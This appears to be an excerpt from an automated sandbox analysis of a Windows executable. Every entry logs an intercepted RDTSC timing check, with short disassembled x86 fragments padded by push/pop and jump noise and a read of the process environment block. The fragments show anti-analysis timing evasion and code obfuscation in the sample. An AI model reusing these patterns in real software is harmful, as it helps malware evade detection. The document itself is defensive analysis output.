Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BE56 second address: E3BE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F804CF71E76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BE62 second address: E3BE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BFD4 second address: E3BFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3C81C second address: E3C849 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804C8F2D9Ah 0x00000013 jmp 00007F804C8F2DA5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3C849 second address: E3C84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3C84F second address: E3C85F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3CAEC second address: E3CAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3CAF4 second address: E3CAF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3CAF9 second address: E3CB1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F804CF71E76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3CB1E second address: E3CB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3E517 second address: E3E51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3E51B second address: E3E521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E413DF second address: E41431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E7Ch 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jo 00007F804CF71E8Fh 0x00000014 push edx 0x00000015 jmp 00007F804CF71E87h 0x0000001a pop edx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F804CF71E7Ah 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 jno 00007F804CF71E7Ch 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E41431 second address: E41437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E41437 second address: E4143B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E4143B second address: E4145F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E42C95 second address: E42CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804CF71E87h 0x00000009 popad 0x0000000a js 00007F804CF71E78h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E4283D second address: E42843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E42843 second address: E42849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E42849 second address: E4284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E4284F second address: E4288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F804CF71E7Eh 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007F804CF71E7Bh 0x00000011 pushad 0x00000012 jmp 00007F804CF71E7Ch 0x00000017 jmp 00007F804CF71E7Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E4288B second address: E428AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F804C8F2DA6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150010 second address: 7150014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150014 second address: 715001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715001A second address: 71500D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804CF71E7Ch 0x00000009 adc al, FFFFFF88h 0x0000000c jmp 00007F804CF71E7Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F804CF71E88h 0x00000018 sub eax, 2298D3E8h 0x0000001e jmp 00007F804CF71E7Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F804CF71E86h 0x0000002d push eax 0x0000002e pushad 0x0000002f mov edi, 39059EF4h 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F804CF71E88h 0x0000003b jmp 00007F804CF71E85h 0x00000040 popfd 0x00000041 pop esi 0x00000042 popad 0x00000043 xchg eax, ebp 0x00000044 jmp 00007F804CF71E87h 0x00000049 mov ebp, esp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71500D7 second address: 71500DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71500DB second address: 71500F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71500F6 second address: 715010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715010E second address: 7150178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 jmp 00007F804CF71E86h 0x00000016 sub esp, 18h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F804CF71E7Dh 0x00000022 xor esi, 24CA8796h 0x00000028 jmp 00007F804CF71E81h 0x0000002d popfd 0x0000002e jmp 00007F804CF71E80h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150178 second address: 7150193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov dl, cl 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150193 second address: 7150197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151572 second address: 7151578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151578 second address: 715157E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715157E second address: 7151582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151582 second address: 71515DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+28h], eax 0x0000000e pushad 0x0000000f call 00007F804CF71E7Eh 0x00000014 pushfd 0x00000015 jmp 00007F804CF71E82h 0x0000001a sbb ax, 9858h 0x0000001f jmp 00007F804CF71E7Bh 0x00000024 popfd 0x00000025 pop eax 0x00000026 mov ah, dl 0x00000028 popad 0x00000029 mov ecx, dword ptr [esi+2Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71515DF second address: 71515E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71515E3 second address: 71515E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71515E9 second address: 7151671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804C8F2DA2h 0x00000009 adc cl, FFFFFFE8h 0x0000000c jmp 00007F804C8F2D9Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F804C8F2DA8h 0x00000018 sbb cx, 3C48h 0x0000001d jmp 00007F804C8F2D9Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov dword ptr [edx+2Ch], ecx 0x00000029 jmp 00007F804C8F2DA6h 0x0000002e mov ax, word ptr [esi+30h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F804C8F2DA7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151671 second address: 7151689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151689 second address: 71516C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007F804C8F2DA7h 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F804C8F2DA5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71516C7 second address: 71516FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F804CF71E88h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71516FC second address: 715170B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715170B second address: 7151711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151711 second address: 7151715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151715 second address: 715174E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b jmp 00007F804CF71E87h 0x00000010 mov dword ptr [edx+34h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F804CF71E80h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715174E second address: 715175D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715175D second address: 715179C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F804CF71E88h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715179C second address: 71517A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71517A2 second address: 71517B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71517B3 second address: 7151834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F80BAEA0CE3h 0x00000011 jmp 00007F804C8F2D9Eh 0x00000016 or dword ptr [edx+38h], FFFFFFFFh 0x0000001a jmp 00007F804C8F2DA0h 0x0000001f or dword ptr [edx+3Ch], FFFFFFFFh 0x00000023 jmp 00007F804C8F2DA0h 0x00000028 or dword ptr [edx+40h], FFFFFFFFh 0x0000002c jmp 00007F804C8F2DA0h 0x00000031 pop esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F804C8F2DA7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7151834 second address: 715183B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0B9A second address: 71A0BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5CFEh 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e pushad 0x0000000f mov ecx, 12A512F3h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BB1 second address: 71A0BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F804CF71E83h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BD1 second address: 71A0BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BD5 second address: 71A0BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BDB second address: 71A0BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0BE1 second address: 71A0C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 pushfd 0x00000011 jmp 00007F804CF71E80h 0x00000016 adc ch, FFFFFF88h 0x00000019 jmp 00007F804CF71E7Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0C12 second address: 71A0C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71406EA second address: 71406F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0671 second address: 70E0675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0675 second address: 70E067B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E067B second address: 70E0681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0681 second address: 70E0685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0685 second address: 70E0689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0AB4 second address: 70E0ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E83h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0ACB second address: 70E0B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F804C8F2DA4h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F804C8F2DA0h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov dx, ax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 70E0B01 second address: 70E0B32 instructions: 0x00000000 rdtsc 0x00000002 call 00007F804CF71E88h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007F804CF71E81h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711003A second address: 711008A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F804C8F2DA3h 0x00000013 and ch, 0000001Eh 0x00000016 jmp 00007F804C8F2DA9h 0x0000001b popfd 0x0000001c mov esi, 6658D3E7h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711008A second address: 71100B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F804CF71E81h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71100B1 second address: 71100BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov eax, 59593AB7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71100BE second address: 7110130 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F804CF71E7Ch 0x00000008 xor ch, FFFFFFA8h 0x0000000b jmp 00007F804CF71E7Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F804CF71E86h 0x0000001b and esp, FFFFFFF0h 0x0000001e jmp 00007F804CF71E80h 0x00000023 sub esp, 44h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov edi, 20E4C950h 0x0000002e call 00007F804CF71E89h 0x00000033 pop ecx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110130 second address: 7110156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b jmp 00007F804C8F2DA0h 0x00000010 movzx eax, bx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edx, ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110156 second address: 7110178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 mov eax, 6689F12Bh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110178 second address: 7110191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6F7709D2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804C8F2D9Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110191 second address: 71101FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804CF71E7Fh 0x00000009 adc eax, 2E76567Eh 0x0000000f jmp 00007F804CF71E89h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F804CF71E80h 0x0000001b jmp 00007F804CF71E85h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov esi, 37D87DF9h 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71101FA second address: 711020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2D9Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711020C second address: 7110210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110210 second address: 7110264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F804C8F2DA7h 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F804C8F2D9Bh 0x00000018 add ax, CBFEh 0x0000001d jmp 00007F804C8F2DA9h 0x00000022 popfd 0x00000023 mov cx, 5847h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110264 second address: 711028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F804CF71E81h 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
